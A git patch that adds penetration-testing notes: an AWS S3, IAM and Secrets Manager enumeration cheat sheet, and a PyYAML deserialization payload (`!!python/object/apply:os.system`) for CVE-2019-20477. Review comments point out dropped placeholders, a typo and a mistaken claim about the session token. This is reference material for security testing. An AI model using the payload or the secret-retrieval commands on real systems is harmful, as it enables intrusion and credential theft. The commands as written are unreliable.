From 615effb8a0d089f5ae44efe07a6acbadce063060 Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 18 Dec 2021 01:55:17 +0100 Subject: [PATCH] yaml deserialization, s3 buckets enum --- enumeration/docs/aws.md | 84 +++++++++++++++++++++++++++++++++ exploit/yaml/deserialization.md | 13 +++++ 2 files changed, 97 insertions(+) create mode 100644 enumeration/docs/aws.md create mode 100644 exploit/yaml/deserialization.md diff --git a/enumeration/docs/aws.md b/enumeration/docs/aws.md new file mode 100644 index 0000000..7f93f56 --- /dev/null +++ b/enumeration/docs/aws.md 
@@ -0,0 +1,84 @@ +# AWS S3 Enumeration + +## Usage + +* [Regions](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-segions) + * `--region` +### Simple Storage Service (S3) +* [S3](https://aws.amazon.com/s3/) +* Methods of access control are as follows + * [Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-policies.html) + * [S3 ACL](https://docs.aws.amazon.com/AmazonS3/latest/userguide/managing-acls.html) + +* Scheme is +```sh +http://.s3.amazonaws.com/file.name +``` +or +```sh +http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext +``` + +* __List content of public bucket via__ +```sh +aws s3 ls s3:/// --no-sign-request +``` +* Download via `curl`, `wget` or `s3` cli via +```sh +aws s3 cp s3:///foo_public.xml . --no-sign-request +``` + +#### ACL +* `Anyone`, just `curl` +* `AuthenticatedUsers`, `s3` cli with aws key + +## IAM +* Not necessarily used by s3 +* Access key ID, starts with `AKIA` + 20 chars +* Secret access key +* Session token, `ASIA` + sessionToken + +* Add credentials to profile via +```sh +aws configure --profile PROFILENAME +``` +* Config and credentials is stored at `~/.aws` +* Sanity test profile via +```sh +aws s3 ls --profile PROFILENAME +``` +* Find account ID to an access key +```sh +aws sts get-access-key-info --access-key-id AKIAEXAMPLE +``` +* Find username to an access key +```sh +aws sts get-caller-identity --profile PROFILENAME +``` +* Listing EC2 instances of an account +```sh +aws ec2 describe-instances --output text --profile PROFILENAME +``` +* aws ec2 describe-instances --output text --profile PROFILENAME +```sh +aws ec2 describe-instances --output text --profile PROFILENAME +``` + * In another region +```sh +aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME +``` + +### AWS ARN +* Unique ID is create via the following scheme +```sh +arn:aws::::/ +``` + +### Secrets + +```sh +aws secretsmanager help +aws secretsmanager 
list-secrets +ws secretsmanager get-secret-value --secret-id --region +``` + diff --git a/exploit/yaml/deserialization.md b/exploit/yaml/deserialization.md new file mode 100644 index 0000000..4a3b281 --- /dev/null +++ b/exploit/yaml/deserialization.md @@ -0,0 +1,13 @@ +# YAML Deserialization + +* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477) +* RCE via Yaml execution by Python + +* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/) + +## Usage + +* Example Payload insid foo.yaml gets executed via Python +```sh +!!python/object/apply:os.system ["id"] +```
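Review bot: several placeholders in the aws.md hunk have been dropped, so the commands cannot be copied as written: the URL schemes read `http://.s3.amazonaws.com/file.name` and `s3:///` with no bucket name, the ARN scheme reads `arn:aws::::/` with none of its fields named, and the Secrets Manager call reads `get-secret-value --secret-id --region` with both values missing. Spell the placeholders out the way the second URL form already does (`BUCKETNAME`, `FILENAME.ext`). Further points in the same hunk: the `describe-instances` example appears twice, once with the command itself as the bullet text, and should be collapsed into one entry; `ws secretsmanager get-secret-value` is missing its leading `a`; the session-token bullet reads `ASIA + sessionToken`, but `ASIA` is the prefix of a temporary access key ID rather than of the session token, so split it into "temporary access key ID starts with `ASIA`" and "session token"; the bare `--region` bullet under Regions needs a sentence saying it is the CLI flag; the Regions link anchor `concepts-available-segions` looks mistyped; and "Not necessarily used by s3" under IAM should say what is meant (for example that anonymous access needs no IAM credentials at all).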
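Review bot: the payload bullet in deserialization.md says the file "gets executed via Python" but never shows the loading call, so a reader cannot tell which `yaml.load` variant and which PyYAML version the `!!python/object/apply:os.system ["id"]` tag fires under; add the one-line loader call next to the payload and state the affected version range that the linked CVE-2019-20477 write-up covers. Minor: `insid` should be `inside`, and the payload fence is tagged `sh` although its content is YAML.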